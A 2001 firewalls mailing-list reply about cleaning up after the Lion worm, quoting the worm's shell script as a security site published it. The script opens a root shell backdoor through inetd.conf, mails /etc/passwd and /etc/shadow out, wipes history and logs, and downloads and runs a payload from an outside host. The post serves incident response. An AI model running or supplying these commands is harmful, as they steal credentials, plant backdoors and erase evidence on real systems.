While I've never personally had to recover a li0n'd box, I can offer some
links to help:
http://www.whitehats.com/library/worms/lion/index.html
By far and above the most comprehensive analysis. Ahem, most of you on this
list should
have whitehats bookmarked already......
Per their site, li0n's code looks like this:
PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';
export PATH;
export TERM=vt100;
rm -rf /dev/.lib;
mkdir /dev/.lib;
cd /dev/.lib;
echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.conf;
killall -HUP inetd;
ifconfig -a>1i0n;
cat /etc/passwd >>1i0n;
cat /etc/shadow >>1i0n;
mail [EMAIL PROTECTED] <1i0n;
rm -fr 1i0n;
rm -fr /.bash_history;
echo >/var/log/messages;
echo >/var/log/maillog;
lynx -dump http://coollion.51.net/crew.tgz >1i0n.tgz;
tar -zxvf 1i0n.tgz;
rm -fr 1i0n.tgz;
cd lib;
./1i0n.sh;
Neat stuff. Looks like the only files modified are inetd.conf. All else is
just echo'd or creatd by the worm.
Hope this helps.
Jeremiah
-----Original Message-----
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]On Behalf Of Alan Clegg
Sent: Friday, May 11, 2001 6:05 AM
To: [EMAIL PROTECTED]
Subject: Re: OT - lionworm
Unless the network is lying to me again, Devdas Bhagat said:
> > 'man install'
> How does install react to a chattr +i'ed file?
I guessed, from the lack of explicit information on how it was failing that
the failure was "text file busy". Until you pointed me to it, I'd never
even heard of 'chattr'. I responded from a more BSD side of the world.
Perhaps 'chflags' ;-)
> Also, given that this is a cracked machine, and the forensic evidence
> modified, why not simply format and reinstall?
Good question, but not related to what he asked. (not that my answer was
correct, and I should probably have kept my yap shut).
> That makes more sense.
I agree.
> Unless you know exactly which files were modified (tripwire or
> something similar)
Which makes me wonder even more about why this was asked on firewalls.
AlanC
-
[To unsubscribe, send mail to [EMAIL PROTECTED] with
"unsubscribe firewalls" in the body of the message.]
-
[To unsubscribe, send mail to [EMAIL PROTECTED] with
"unsubscribe firewalls" in the body of the message.]
